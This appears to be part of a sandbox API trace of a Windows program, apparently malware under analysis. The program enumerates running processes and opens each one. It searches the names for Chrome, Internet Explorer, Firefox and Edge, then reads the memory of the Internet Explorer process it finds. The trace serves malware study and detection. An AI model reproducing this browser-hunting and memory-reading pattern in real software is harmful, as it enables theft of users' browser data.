	[0205.933] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.933] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0205.934] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x2db4
	[0205.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.934] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.934] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.934] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.935] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.935] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0205.935] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2db8
	[0205.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.936] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0205.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.936] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.940] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0205.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.940] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.940] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0205.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2dbc
	[0205.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.941] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0205.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.941] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.942] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0205.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.942] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.942] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0205.943] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2dc0
	[0205.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.943] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0205.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.943] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.943] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0205.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.944] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.944] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0205.945] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2dc4
	[0205.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.945] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0205.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.945] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.945] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0205.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.946] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.946] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0205.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2dc8
	[0205.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.947] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0205.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.947] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.947] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0205.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.947] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.948] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0205.948] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2dcc
	[0205.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.948] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0205.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.949] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.949] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0205.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.950] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.950] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0205.951] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0205.951] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0205.952] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2dd0
	[0205.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.952] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0205.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.953] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.953] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0205.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.954] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.954] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0205.955] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2dd4
	[0205.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.955] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0205.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.955] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.956] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0205.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.956] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.956] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0205.957] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2dd8
	[0205.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.957] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0205.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.957] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.958] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0205.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.958] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.958] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0205.959] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2ddc
	[0205.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.959] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0205.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.959] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.960] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0205.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.960] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.960] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0205.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2de0
	[0205.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.961] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0205.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.961] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.962] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0205.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.962] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.963] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0205.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2de4
	[0205.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.964] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0205.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.964] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.964] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0205.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.964] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.964] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0205.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2de8
	[0205.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.965] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0205.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.966] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.966] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0205.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.967] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.967] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0205.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x2dec
	[0205.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.969] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0205.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.969] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.970] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0205.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.970] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.971] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0205.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2df0
	[0205.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.971] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0205.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.972] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.972] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0205.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.972] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.972] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0205.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2df4
	[0205.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.973] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0205.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.973] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.974] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0205.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.974] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.974] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0205.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2df8
	[0205.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.975] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0205.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.975] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.976] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0205.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.976] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.976] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0205.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x2dfc
	[0205.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.977] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0205.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.978] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.978] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0205.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.979] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.979] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0205.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2e00
	[0205.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.980] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0205.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.981] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.981] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0205.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.982] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.982] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0205.983] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2e04
	[0205.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.983] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0205.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.986] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.987] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0205.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.987] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.988] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0205.989] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2e08
	[0205.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.989] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0205.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.989] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0205.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.990] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0205.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.990] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.991] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0205.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x2e0c
	[0205.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.991] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0205.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.992] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0205.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.992] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0205.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0205.992] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0205.992] NtQueryInformationProcess (in: ProcessHandle=0x2e0c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0205.992] ReadProcessMemory (in: hProcess=0x2e0c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0205.993] ReadProcessMemory (in: hProcess=0x2e0c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0205.993] ReadProcessMemory (in: hProcess=0x2e0c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0205.993] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
